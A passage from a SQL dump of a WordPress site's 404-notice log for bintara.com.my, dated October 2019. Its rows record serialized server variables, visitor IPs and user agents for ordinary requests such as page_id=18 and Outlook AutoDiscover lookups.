14:30:45',35051616,36857128,'https://bintara.com.my/logitech/favicon.ico',1,0,'60.50.71.184'),(27782,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:76:\"text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:75:\"Mozilla/5.0 (compatible; SemrushBot/6~bl; +http://www.semrush.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"46.229.168.141\";s:11:\"REMOTE_PORT\";s:5:\"22558\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ3VXgdB7FBR0bQuaTu9FwAAAA8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570624862.867\";s:12:\"REQUEST_TIME\";s:10:\"1570624862\";}}','notice','2019-10-09 12:41:06','2019-10-09 12:41:03',35425088,37225256,'https://bintara.com.my/?page_id=18',1,0,'46.229.168.141'),(27780,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/AutoDiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"359\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"342-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:35:\"microsoft.windowscommunicationsapps\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"342-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/AutoDiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/AutoDiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ2y2oxV0SvqUWaw3AGpwgAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/AutoDiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"113.210.201.35\";s:11:\"REMOTE_PORT\";s:5:\"62799\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/AutoDiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/AutoDiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ2y2oxV0SvqUWaw3AGpwgAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570616026.5481\";s:12:\"REQUEST_TIME\";s:10:\"1570616026\";}}','notice','2019-10-09 10:13:49','2019-10-09 10:13:47',35801112,37599288,'https://bintara.com.my/AutoDiscover/AutoDiscover.xml',1,0,'113.210.201.35'),(27778,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:130:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Iridium/2018.4 Safari/537.36 Chrome/66.0.3359.130\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"61260\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ2XJjYvewXbs3FTz9-3bwAAAZY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570608934.4263\";s:12:\"REQUEST_TIME\";s:10:\"1570608934\";}}','notice','2019-10-09 08:15:37','2019-10-09 08:15:34',35426896,37229720,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(27779,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"4A37A339-481F-43EC-B395-66D672DB874E\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ2ikwdB7FBR0bQuaTunYQAAABU\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.59\";s:11:\"REMOTE_PORT\";s:5:\"55860\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ2ikwdB7FBR0bQuaTunYQAAABU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570611859.5909\";s:12:\"REQUEST_TIME\";s:10:\"1570611859\";}}','notice','2019-10-09 09:04:22','2019-10-09 09:04:19',35790792,37585616,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.59'),(27777,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"64159\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ2VMwyq3KpmTg5qzE5RSwAAAM0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570608435.7512\";s:12:\"REQUEST_TIME\";s:10:\"1570608435\";}}','notice','2019-10-09 08:07:17','2019-10-09 08:07:16',35031808,36836824,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(27776,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"62826\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ2VHCFP7p535BJctBadHwAAAEg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570608412.6197\";s:12:\"REQUEST_TIME\";s:10:\"1570608412\";}}','notice','2019-10-09 08:06:54','2019-10-09 08:06:53',35031808,36836824,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(27775,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"61141\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ2U-zYvewXbs3FTz9-2gAAAAYU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570608383.5853\";s:12:\"REQUEST_TIME\";s:10:\"1570608383\";}}','notice','2019-10-09 08:06:25','2019-10-09 08:06:24',35031808,36836824,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(27774,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"59597\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ2U5FeCSx7farFWWaNKiQAAAQ8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570608356.716\";s:12:\"REQUEST_TIME\";s:10:\"1570608356\";}}','notice','2019-10-09 08:05:58','2019-10-09 08:05:57',35031808,36836824,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(27772,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"56816\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ2UtTYvewXbs3FTz9-2WgAAAZM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570608309.3612\";s:12:\"REQUEST_TIME\";s:10:\"1570608309\";}}','notice','2019-10-09 08:05:11','2019-10-09 08:05:09',35026512,36835712,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(27773,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 